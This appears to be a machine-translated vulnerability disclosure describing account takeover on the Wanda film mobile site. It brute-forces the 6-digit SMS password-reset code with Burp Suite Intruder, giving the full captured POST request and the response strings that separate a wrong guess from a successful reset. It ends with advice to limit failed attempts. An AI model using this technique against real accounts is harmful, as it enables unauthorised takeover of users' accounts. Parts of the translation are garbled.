Password Reset Vulnerability and repair for any account on Wanda movie website

1. The main station of Wanda film website has deployed a powerful verification code to reset the password of this module, so there is no problem here! 2. However, the website accessed by the Mobile Terminal http://m.wandafilm.com If there is a problem and no verification code is deployed, You can reset the password of any account by cracking the text message code (different from the image verification code, called the text message code here! First Open the main site of the mobile terminal and click [member center] 3. If you do not log on, you will jump to the logon page, but you will see [forgot password ?]. I'm so excited: 4. Click her! Enter the mobile phone number to retrieve the password. I tested it here and used my own phone number: 5. click [get verification code], and the website jumps to the Reset page. At the same time, the mobile phone receives the text message code, which is 6 digits: 745233. I will write a 6-digit pure digit Verification Code 111111, enter the password to be reset and click Submit. Capture packets and check the request. The message "Incorrect mobile phone verification code" is displayed. from the packet capture data, the POST request is: POST/member/resetPassByToken. do HTTP/1.1 Host: m. wandafilm. comProxy-Connection: keep-aliveContent-Length: 48Cache-Control: max-age = 0 Origin: http://m.wandafilm.com User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4Content-Type: application/x-www-form-urlencodedAccept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8 Referer: http://m.wandafilm.com /Member/findPass. doAccept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN, zh; q = 0.8Accept-Charset: GBK, UTF-8; q = 0.7, *; q = 0.3 Cookie: cityCodeCookies = 3774659600; JSESSIONID = Beijing; _ utma = Beijing; _ utmb = 81395784.33.10.1351810426; _ utmc = 81395784; _ utmz = Shanghai = wanda.cn | utmccn =) | utmcmd = referral | utmcct =/group/jumpPage/mongo.shtml; Weight = 1351818647992,135181921361, 1351837925819; Weight = 1351838684225 mobileNo = Mobile Phone Number & token = 111111 & newPass = 222222, the verieno parameter is the mobile phone number, the token parameter is the SMS code, and newPass is the password to be reset. As long as the token is guessed right, You can reset the password of the mobile phone number in one request:
7. continue to simulate the above request, send the POST request to the intruder module of burpsuite, and set the parameter to be cracked as token: 8. because it was just a test, I started to blow up from 745200. If the token is incorrect during the blow-up, the words "Wanda film _ System Busy" will be returned, the number of words returned can also be determined as follows: 9. after the SMS code is successfully cracked, the system will return the words "Wanda movie Mobile _ password modified successfully": 10. you can use the cracked account and password to log on to the system:



 Solution:1. In fact, there is indeed a small limit for resetting the mobile user password. The text message code is valid for 5 minutes, but it is not a real hacker! If the network speed is acceptable and the request for brute-force Verification Code cracking can be performed every second, it takes only two minutes for 10 computers to reset their accounts with 1000 concurrent threads! 2. The text message code can be 6 digits or even 4 digits. You do not need to set the image verification code or even the validity period of the text message code. But why don't I lock the password reset request if I fail to set the password for five consecutive attempts?